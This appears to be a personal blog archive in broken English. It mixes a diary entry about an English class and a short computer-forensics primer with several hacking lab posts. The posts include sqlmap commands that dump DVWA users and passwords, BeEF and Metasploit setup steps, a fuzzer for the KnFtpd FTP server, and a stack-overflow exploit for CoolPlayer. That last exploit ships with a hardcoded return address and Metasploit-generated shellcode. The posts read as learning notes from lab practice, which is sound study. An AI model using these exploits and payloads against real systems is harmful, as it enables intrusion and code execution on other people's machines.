Selasa, 08 April 2014

First Time Class In LIA

     Yups, on saturday i follow  for course in the LIA. I participated Conversation class at level 1 .. i course every saturday in LIA bintaro, at 8-12 AM. And at on 5 april 2014 first claas in course.i learned in the class room number 202, and only followed by 2 students. yapsss just two student.
     In Class, just me and my new freind, dita. he is from ciledug,ohhhh it's so far from course place. my theacher is miss saraswati, someone  a cool, freindly and funny, because 2 student which staudy in course , proses pembelajaran just only until 11:30 am.
     
Diposting oleh di Tidak ada komentar:

Minggu, 28 Oktober 2012

Introduction Forensic Bacis

Computer Forensic 

Computer forensics (sometimes known as computer forensic science) is a branch of digital forensic science pertaining to legal evidence found in computers and digital storage media. The goal of computer forensics is to examine digital media in a forensically sound manner with the aim of identifying, preserving, recovering, analyzing and presenting facts and opinions about the information.

 Unllocated space

Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g Windows, can write to. To put it another way it is the opposite of “allocated” space, which is where the operating system has already written files to.
Unallocated file space and file slack are both important sources of leads for the computer forensics investigator. The data storage area in a factory fresh hard disk drive typically contains patterns of sectors which are filled with patterns of format characters. In DOS and Windows-based computer systems, the format pattern for a floppy diskette usually consists of binary data in the form of hex F6s. The same format pattern is sometimes used in the format of hard disk drives but the format patterns can consist of essentially any repeat character as determined by the factory test machine that made the last writes to the hard disk drive. The format pattern is overwritten as files and subdirectories are written in the data area.

Slack Space
Slack space refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.
Illustration of slack space on a hard drive
Illustration of slack space on a hard drive
Diposting oleh di Tidak ada komentar:

Selasa, 23 Oktober 2012

DVWA Exploit (Medium)

1. open your DVWA , and login
   username  = admin
   password  = password


2.setting DVWA security become Medium


and then choose Sql Injection and the click submit

check cookie in burpsuite
4. open terminal, and change direktori to "sqlmap "
5. running sqlmap, with cookie sand result last submit

 "./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "Cookie: securityid=%27&Submit=Submit#" --cookie "Cookie: security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5"

and this result
6. search password
 "./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "Cookie: securityid=%27&Submit=Submit#" --cookie "Cookie: security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5" --Users --password

and this result
sorry not to root, I am still trying to get root
Diposting oleh di Tidak ada komentar:

Jumat, 19 Oktober 2012

combination windows with metasploit exploit and beef


1. switch on "beef"
 
2. open link on URL http://127.0.0.1:3000/ui/panel, and this result
3.  login before entor to home panel beef with username and password same "beef"


 

and this result after login


4. make file "victim.html", for place "beef"


5. look the result, it will display "alert dialog" according to the insert in the panel already home "beef".

 do execute for beef panel with alert dialog
6.open a msfconsole






Diposting oleh di Tidak ada komentar:

Minggu, 14 Oktober 2012

How to Use POP POP RETN

RETN POP POP used to bypass Sehhandler in an application ..as a regular apliasi its protection by Safeseh, Safeseh which serves to protect Sehhandler, therefore we need a module ..Her usual default module is not protected safeseh
Diposting oleh di Tidak ada komentar:

Senin, 08 Oktober 2012

KnFtpd 1.0.0 exploit

1. make fuzzer

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

open knftpd and ollydbg, do fuzzing, and this result
after fuzzing see EIP and SEH chain
 this result after press SHIFT + F9 in seh chain

2. create pattern offset and results
edit file fuzzer become
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
#buffer = "\x41" * 3000
buffer = "Aa0Aa1Aa2Aa3Aa4A........." #result generate offset

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

3. search value POP r32, POP r32 and RETn, and this result

edit your file fuzzer become

 #!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322
buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()




   and do fuzzer, this result


4. check with deadbeef
again edit your file fuzzer, become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322
#buffer+="\xef\xbe\xad\xde"
buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()





and this result
after thet, checking jmp ESP , i am use kernel32.dll, check this result


Diposting oleh di Tidak ada komentar:

CoolPalyer In Exploit (local)

1. make file fuzzer, as shown below:
myfile="cool.m3u"
myjunk="\x41" * 500
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()


 and tehn , running Coolplayer and olldbg, load file "cool.m3u" and the Crash.. look register IP in ollydbg overwrite

 
Cek In SEH Chain, and this result and the press Shift + F9




2. you make pattern offset, and copy result pattern offset on this file fuzzer
become :
myfile="cool.m3u"
myjunk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7
Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8A
d9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7
Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8
Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak
3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am
5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A
o6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()

do running coolplayer and olldbg, load do fuzzing, and this result value EIP

3. do DEADBEEF for check, before check deadbeef , make a pattern offset

edit our file fuzzer, become

myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xEF\xBE\xAD\xDE"
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
and this result
4. Finding JMP ESP
choose Execute Modules , in here i use shell32.dll -double click in shell32.dll.. and the right click- search for -comand, type JSM ESP..

and this result

and press shift+ F9 for checking stack , and this result

5. Edit your file fuzzer, to get the calculator to prove that the correct offset pattern.. open browser and click 127.0.0.1:55555, choose payload-windows execute command, as a below

#!/usr/bin/python
myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xD7\x30\x9D\x7C"
myjunk+="\x90" * 16
myjunk+=("\xdb\xdc\xb8\x76\x35\x3c\x23\x2b\xc9\xb1\x23\xd9\x74\x24\xf4\x5f"
"\x83\xef\xfc\x31\x47\x13\x03\x31\x26\xde\xd6\x41\xa0\x5a\x19\xb9"
"\x31\xe8\x5c\x85\xba\x92\x5b\x8d\xbd\x85\xef\x22\xa6\xd2\xaf\x9c"
"\xd7\x0f\x06\x57\xe3\x44\x98\x89\x3d\x9b\x02\xf9\xba\xdb\x41\x06"
"\x02\x11\xa4\x09\x46\x4d\x43\x32\x12\xb6\xa8\x31\x7f\x3d\xef\x9d"
"\x7e\xa9\x76\x56\x8c\x66\xfc\x37\x91\x79\xe9\x4c\xb5\xf2\xec\xb9"
"\x4f\x58\xcb\x39\x93\x50\xd3\x25\x98\xd3\xe3\x20\x5e\xab\x0f\xa1"
"\x1f\x40\x9b\xc5\x83\xf5\x10\x4d\xb4\xee\x2e\x06\x44\x40\x30\x18"
"\x45\x2a\x59\x24\x1a\x1d\x6c\x34\xf2\xd4\x68\x37\x3a\x9d\xd8\x5f"
"\x4b\xe8\xdd\xc0\xc3\x75\x23\x74\x1d\xd1\x23\x6f\x41\xbc\xb7\x0c"
"\x86")
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
 
running coolplayer and the load file fuzzer before his, and then this result
 
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)